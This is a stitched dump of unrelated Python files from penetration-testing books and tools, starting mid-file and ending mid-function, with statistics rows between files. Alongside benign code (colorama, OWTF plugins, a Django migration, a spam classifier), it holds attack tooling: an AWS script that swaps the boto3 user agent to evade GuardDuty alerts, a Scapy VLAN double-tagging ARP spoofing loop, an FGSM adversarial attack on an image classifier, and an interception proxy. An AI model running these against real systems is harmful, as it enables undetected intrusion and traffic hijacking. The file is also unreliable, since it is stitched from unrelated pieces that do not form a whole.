global orig_stdout, orig_stderr
orig_stdout = sys.stdout
orig_stderr = sys.stderr
if sys.stdout is None:
wrapped_stdout = None
else:
sys.stdout = wrapped_stdout = \
wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
if sys.stderr is None:
wrapped_stderr = None
else:
sys.stderr = wrapped_stderr = \
wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
global atexit_done
if not atexit_done:
atexit.register(reset_all)
atexit_done = True
def deinit():
if orig_stdout is not None:
sys.stdout = orig_stdout
if orig_stderr is not None:
sys.stderr = orig_stderr
@contextlib.contextmanager
def colorama_text(*args, **kwargs):
init(*args, **kwargs)
try:
yield
finally:
deinit()
def reinit():
if wrapped_stdout is not None:
sys.stdout = wrapped_stdout
if wrapped_stderr is not None:
sys.stderr = wrapped_stderr
def wrap_stream(stream, convert, strip, autoreset, wrap):
if wrap:
wrapper = AnsiToWin32(stream,
convert=convert, strip=strip, autoreset=autoreset)
if wrapper.should_wrap():
stream = wrapper.stream
return stream
| 22.108434 | 81 | 0.653104 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2, 2015
Purpose: To grab your current Public IP (Eth & WLAN), Private IP, MAC Addresses, FQDN, and Hostname
Name: hostDetails.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import os
import socket
import subprocess
import shutil
import errno
if os.name != "nt":
import fcntl
import urllib2
import struct
import uuid
def get_ip(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', inter[:15]))[20:24])
return ip_addr
def get_mac_address(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', inter[:15]))
mac_address = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
return mac_address
def get_localhost_details(interfaces_eth, interfaces_wlan):
hostdata = "None"
hostname = "None"
windows_ip = "None"
eth_ip = "None"
wlan_ip = "None"
host_fqdn = "None"
eth_mac = "None"
wlan_mac = "None"
windows_mac = "None"
hostname = socket.gethostbyname(socket.gethostname())
if hostname.startswith("127.") and os.name != "nt":
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(hostdata[1]).strip('[]')
host_fqdn = socket.getfqdn()
for interface in interfaces_eth:
try:
eth_ip = get_ip(interface)
if not "None" in eth_ip:
eth_mac = get_mac_address(interface)
break
except IOError:
pass
for interface in interfaces_wlan:
try:
wlan_ip = get_ip(interface)
if not "None" in wlan_ip:
wlan_mac = get_mac_address(interface)
break
except IOError:
pass
else:
windows_ip = socket.gethostbyname(socket.gethostname())
windows_mac = uuid.getnode()
windows_mac = ':'.join(("%012X" % windows_mac)[i:i+2] for i in range(0, 12, 2))
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(socket.gethostname())
host_fqdn = socket.getfqdn()
return hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn, eth_mac, wlan_mac, windows_mac
def get_public_ip(request_target):
grabber = urllib2.build_opener()
grabber.addheaders = [('User-agent','Mozilla/5.0')]
try:
public_ip_address = grabber.open(target_url).read()
except urllib2.HTTPError, error:
print("There was an error trying to get your Public IP: %s") % (error)
except urllib2.URLError, error:
print("There was an error trying to get your Public IP: %s") % (error)
return public_ip_address
wireless_ip = "None"
windows_ip = "None"
ethernet_ip = "None"
public_ip = "None"
host_fqdn = "None"
hostname = "None"
fqdn = "None"
ethernet_mac = "None"
wireless_mac = "None"
windows_mac = "None"
target_url = "http://ip.42.pl/raw"
inter_eth = ["eth0", "eth1", "eth2", "eth3"]
inter_wlan = ["wlan0", "wlan1", "wlan2", "wlan3", "wifi0", "wifi1", "wifi2", "wifi3", "ath0", "ath1", "ath2", "ath3"]
public_ip = get_public_ip(target_url)
hostdata, hostname, windows_ip, ethernet_ip, wireless_ip, host_fqdn, ethernet_mac, wireless_mac, windows_mac = get_localhost_details(inter_eth, inter_wlan)
if not "None" in public_ip:
print("Your Public IP address is: %s") % (str(public_ip))
else:
print("Your Public IP address was not found")
if not "None" in ethernet_ip:
print("Your Ethernet IP address is: %s") % (str(ethernet_ip))
print("Your Ethernet MAC address is: %s") % (str(ethernet_mac))
elif os.name != "nt":
print("No active Ethernet Device was found")
if not "None" in wireless_ip:
print("Your Wireless IP address is: %s") % (str(wireless_ip))
print("Your Wireless Devices MAC Address is: %s") % (str(wireless_mac))
elif os.name != "nt":
print("No active Wireless Device was found")
if not "None" in windows_ip:
print("Your Windows Host IP address is: %s") % (str(windows_ip))
print("Your Windows Mac address is: %s") % (str(windows_mac))
else:
print("You are not running Windows")
if not "None" in hostname:
print("Your System's hostname is: %s") % (hostname)
if host_fqdn == 'localhost':
print("Your System is not Registered to a Domain")
else:
print("Your System's Fully Qualifed Domain Name is: %s") % (host_fqdn)
| 37.5 | 155 | 0.672233 |
owtf | """
ACTIVE Plugin for Generic Unauthenticated Web App Fuzzing via Wapiti
This will perform a "low-hanging-fruit" pass on the web app for easy to find (tool-findable) vulns
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Active Vulnerability Scanning without credentials via Wapiti"
def run(PluginInfo):
resource = get_resources("Wapiti_Unauth")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 35.214286 | 98 | 0.774704 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.6
class Methods():
class_var=200
def __init__(self):
self.variable=0
def instance_method(self):
self.variable=100
print("------------------------------")
print("Inside Instance Method")
print("Instance is : " +str(self))
print("Instance variable is : "+str(self.variable))
print("Class variable is : " +str(self.__class__.class_var))
print("------------------------------\n")
@classmethod
def class_method(cls):
print("------------------------------")
print("Inside Class Method")
try:
self.variable=22
print("Instance variable is : "+str(Methods().variable))
except Exception as ex:
print("Cant access instance variable in class method")
cls.class_var=33
print("Class is : " +str(cls))
print("Class variable is : "+str(cls.class_var))
print("------------------------------\n")
@staticmethod
def static_method():
print("Inside Static Method")
try:
print("Class=%s and Instance variable =%s : ",(class_var,str(self.variable)))
except Exception as ex:
print("Cant access class and instance variable in static method")
class Driver():
def main(self):
o=Methods()
o.instance_method()
o.class_method()
Methods.class_method()
o.static_method()
Methods.static_method()
print("\n*****************************************************")
print("Lets see variable access of class variables\n\n")
print("--------------------------------------------------")
print('Accessing class variable with Instance "o" : '+str(o.class_var))
o.class_var=222
print('Modifying class variable with Instance "o" : o.class_var = 222')
print('Accessing modified class variable with Instance "o" : ' +str(o.class_var))
print("--------------------------------------------------\n\n")
print("-------------------------------------------------")
oo=Methods()
print('Accessing class variable with New instance "oo" : '+str(oo.class_var))
print('Changes not persisted thus modifying o.class_var created local copy for instance o')
print("--------------------------------------------------\n\n")
print("-------------------------------------------------")
print('Accessing class variable with Class variable : '+str(Methods.class_var))
print('Changes not persisted thus modifying o.class_var created local copy for instance o')
print("--------------------------------------------------\n\n")
print("\n*****************************************************\n")
d=Driver();d.main()
| 33.136986 | 93 | 0.531112 |
Mastering-Machine-Learning-for-Penetration-Testing | import foolbox
import keras
import numpy as np
from keras.applications.resnet50 import ResNet50
import matplotlib.pyplot as plt
# instantiate model
keras.backend.set_learning_phase(0)
kmodel = ResNet50(weights='imagenet')
preprocessing = (np.array([104, 116, 123]), 1)
fmodel = foolbox.models.KerasModel(kmodel, bounds=(0, 255), preprocessing=preprocessing)
# get source image and label
image, label = foolbox.utils.imagenet_example()
# apply attack on source image
# ::-1 reverses the color channels, because Keras ResNet50 expects BGR instead of RGB
attack = foolbox.attacks.FGSM(fmodel)
adversarial = attack(image[:, :, ::-1], label)
plt.figure()
plt.subplot(1, 3, 1)
plt.title('Original')
plt.imshow(image / 255) # division by 255 to convert [0, 255] to [0, 1]
plt.axis('off')
plt.subplot(1, 3, 2)
plt.title('Adversarial')
plt.imshow(adversarial[:, :, ::-1] / 255) # ::-1 to convert BGR to RGB
plt.axis('off')
plt.subplot(1, 3, 3)
plt.title('Difference')
difference = adversarial[:, :, ::-1] - image
plt.imshow(difference / abs(difference).max() * 0.2 + 0.5)
plt.axis('off')
plt.show()
| 26.55 | 88 | 0.712988 |
owtf | """
tests.functional.cli.test_except
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliExceptTest(OWTFCliTestCase):
categories = ["cli"]
def test_except(self):
"""Run OWTF web plugins except one."""
self.run_owtf(
"-s",
"-g",
"web",
"-e",
"OWTF-WVS-006",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
self.assert_is_not_in_logs(
"Target: %s://%s:%s -> Plugin: Skipfish Unauthenticated"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Skipfish plugin should not have been run!",
)
| 25.117647 | 68 | 0.488162 |
owtf | """
owtf.api.handlers.index
~~~~~~~~~~~~~~~~~~~~~~~
"""
from owtf.api.handlers.base import UIRequestHandler
class IndexHandler(UIRequestHandler):
"""Serves the main webapp"""
SUPPORTED_METHODS = ["GET"]
def get(self, path):
"""Render the homepage with all JavaScript and context.
**Example request**:
.. sourcecode:: http
GET / HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Server: TornadoServer/5.0.1
Content-Type: text/html; charset=UTF-8
"""
self.render("index.html")
| 20.527778 | 83 | 0.55814 |
owtf | """
Plugin for probing snmp
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " SNMP Probing "
def run(PluginInfo):
resource = get_resources("BruteSnmpProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 24 | 88 | 0.75 |
Mastering-Machine-Learning-for-Penetration-Testing | # inspired by Abhijeet Singh classifier
import os
import numpy as np
from collections import Counter
from sklearn.svm import LinearSVC
from sklearn.metrics import confusion_matrix
def make_Dictionary(train_dir):
emails = [os.path.join(train_dir,f) for f in os.listdir(train_dir)]
all_words = []
for mail in emails:
with open(mail) as m:
for i,line in enumerate(m):
if i == 2:
words = line.split()
all_words += words
dictionary = Counter(all_words)
list_to_remove = dictionary.keys()
for item in list_to_remove:
if item.isalpha() == False:
del dictionary[item]
elif len(item) == 1:
del dictionary[item]
dictionary = dictionary.most_common(3000)
return dictionary
def extract_features(mail_dir):
files = [os.path.join(mail_dir,fi) for fi in os.listdir(mail_dir)]
features_matrix = np.zeros((len(files),3000))
docID = 0;
for fil in files:
with open(fil) as fi:
for i,line in enumerate(fi):
if i == 2:
words = line.split()
for word in words:
wordID = 0
for i,d in enumerate(dictionary):
if d[0] == word:
wordID = i
features_matrix[docID,wordID] = words.count(word)
docID = docID + 1
return features_matrix
# Create a dictionary of words with its frequency
train_dir = 'lingspam_public\\lemm_stop\\train-mails'
dictionary = make_Dictionary(train_dir)
# Prepare feature vectors per training mail and its labels
train_labels = np.zeros(702)
train_labels[351:701] = 1
train_matrix = extract_features(train_dir)
# Training SVM and Naive bayes classifier and its variants
model = LinearSVC()
model.fit(train_matrix,train_labels)
# Test the unseen mails for Spam
test_dir = 'lingspam_public\\lemm_stop\\test-mails'
test_matrix = extract_features(test_dir)
test_labels = np.zeros(260)
test_labels[130:260] = 1
result = model.predict(test_matrix)
print confusion_matrix(test_labels,result)
| 26.423077 | 75 | 0.622544 |
Hands-On-AWS-Penetration-Testing-with-Kali-Linux | import random
import boto3
import botocore
# A list of user agents that won't trigger GuardDuty
safe_user_agents = [
'Boto3/1.7.48 Python/3.7.0 Windows/10 Botocore/1.10.48',
'aws-sdk-go/1.4.22 (go1.7.4; linux; amd64)',
'aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10'
]
# Grab the current user agent
user_agent = boto3.session.Session()._session.user_agent().lower()
# Check if we are on Kali, Parrot, or Pentoo Linux against a lowercase version of the user agent
if 'kali' in user_agent.lower() or 'parrot' in user_agent.lower() or 'pentoo' in user_agent.lower():
# Change the user agent to a random one from the list of safe user agents
user_agent = random.choice(safe_user_agents)
# Prepare a botocore config object with our user agent
botocore_config = botocore.config.Config(
user_agent=user_agent
)
# Create the boto3 client, using the botocore config we just set up
client = boto3.client(
'ec2',
region_name='us-east-1',
config=botocore_config
)
# Print out the results of our EC2 DescribeInstances call
print(client.describe_instances()) | 30.4 | 100 | 0.71949 |
Python-Penetration-Testing-Cookbook | import urllib2
import re
from os.path import basename
from urlparse import urlsplit
url = 'https://www.packtpub.com/'
response = urllib2.urlopen(url)
source = response.read()
file = open("packtpub.txt", "w")
file.write(source)
file.close()
patten = '(http)?s?:?(\/\/[^"]*\.(?:png|jpg|jpeg|gif|png|svg))'
for line in open('packtpub.txt'):
for m in re.findall(patten, line):
print('https:' + m[1])
fileName = basename(urlsplit(m[1])[2])
print(fileName)
try:
img = urllib2.urlopen('https:' + m[1]).read()
file = open(fileName, "w")
file.write(img)
file.close()
except:
pass
break
| 23.75 | 63 | 0.570809 |
Python-Penetration-Testing-Cookbook | #!/usr/bin/python
import time
from scapy.all import *
iface = "en0"
target_ip = '192.168.1.2'
fake_ip = '192.168.1.3'
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1
target_vlan = 2
ether = Ether()
dot1q1 = Dot1Q(vlan=our_vlan)
dot1q2 = Dot1Q(vlan=target_vlan)
arp = ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ether/dot1q1/dot1q2/arp
try:
while True:
sendp(packet, iface=iface)
time.sleep(10)
except KeyboardInterrupt:
print("Exiting.. ")
sys.exit(0)
| 15.0625 | 67 | 0.647173 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('addParameter_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('addParameter', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.TextField')(blank=True)),
('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.TextField')(blank=True)),
('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'addParameter': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'addParameter_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.357798 | 130 | 0.571208 |
cybersecurity-penetration-testing | #!/usr/bin/python
import sys
import socket
import argparse
import threading
config = {
'debug': False,
'verbose': False,
'timeout' : 5.0,
}
# =========================================================
# CUSTOM ANALYSIS, FUZZING, INTERCEPTION ROUTINES.
def requestHandler(buff):
'''
Modify any requests destined for the REMOTE host service.
'''
return buff
def responseHandler(buff):
'''
Modify any responses destined for the LOCAL host service.
'''
return buff
# =========================================================
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stderr.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stderr.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x, fatal = False):
Logger._out('[!] ' + x)
if fatal: sys.exit(-1)
@staticmethod
def fail(x, fatal = False):
Logger._out('[-] ' + x)
if fatal: sys.exit(-1)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def hexdump(src, length = 16):
result = []
digits = 4 if isinstance(src, unicode) else 2
num = len(src)
for i in range(0, num, length):
s = src[i:i+length]
hexa = b' '.join(['%0*X' % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7f else b'.' for x in s])
result.append(b'%04x | %-*s | %s' % (i, length * (digits + 1), hexa, text))
return str(b'\n'.join(result))
def recvFrom(sock):
'''
Simple recvAll based on timeout exception.
'''
buff = ''
sock.settimeout(config['timeout'])
try:
while True:
data = sock.recv(4096)
if not data: break
buff += data
except:
pass
return buff
def proxyHandler(clientSock, remoteHost, remotePort, recvFirst):
Logger.dbg('Connecting to REMOTE service: {}:{}'.format(remoteHost, remotePort))
try:
remoteSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteSock.settimeout(config['timeout'])
remoteSock.connect((remoteHost, remotePort))
Logger.dbg('Connected.')
except Exception as e:
Logger.err('TCP Proxy was unable to connect to REMOTE service: {}:{}'.format(
remoteHost, remotePort), fatal = True
)
if recvFirst:
remoteBuff = recvFrom(remoteSock)
Logger.info('[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff)))
Logger.dbg('Remote service Recv buff BEFORE responseHandler:\n' + hexdump(remoteBuff))
remoteBuffOrig = remoteBuff
remoteBuff = responseHandler(remoteBuff)
if remoteBuff != remoteBuffOrig:
Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format(
len(remoteBuffOrig, remoteBuff)))
Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff))
if len(remoteBuff):
Logger.info('[<==] Sending {} bytes to LOCAL service.'.format(len(remoteBuff)))
clientSock.send(remoteBuff)
# Send & Receive / Proxy loop
while True:
# LOCAL part
localBuff = recvFrom(clientSock)
if len(localBuff):
Logger.info('[==>] Received {} bytes from LOCAL service.'.format(len(localBuff)))
Logger.dbg('Local service Recv buff:\n' + hexdump(localBuff))
localBuffOrig = localBuff
localBuff = requestHandler(localBuff)
if localBuff != localBuffOrig:
Logger.dbg('Buffer to be sent to REMOTE service modified. Lengths: {} -> {}'.format(
len(localBuffOrig, localBuff)))
Logger.dbg('Local service Recv buff AFTER requestHandler:\n' + hexdump(localBuff))
remoteSock.send(localBuff)
Logger.info('[==>] Sent to REMOTE service.')
# REMOTE part
remoteBuff = recvFrom(remoteSock)
if len(remoteBuff):
Logger.info('[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff)))
Logger.dbg('Remote service Recv buff:\n' + hexdump(remoteBuff))
remoteBuffOrig = remoteBuff
remoteBuff = responseHandler(remoteBuff)
if remoteBuff != remoteBuffOrig:
Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format(
len(remoteBuffOrig, remoteBuff)))
Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff))
clientSock.send(remoteBuff)
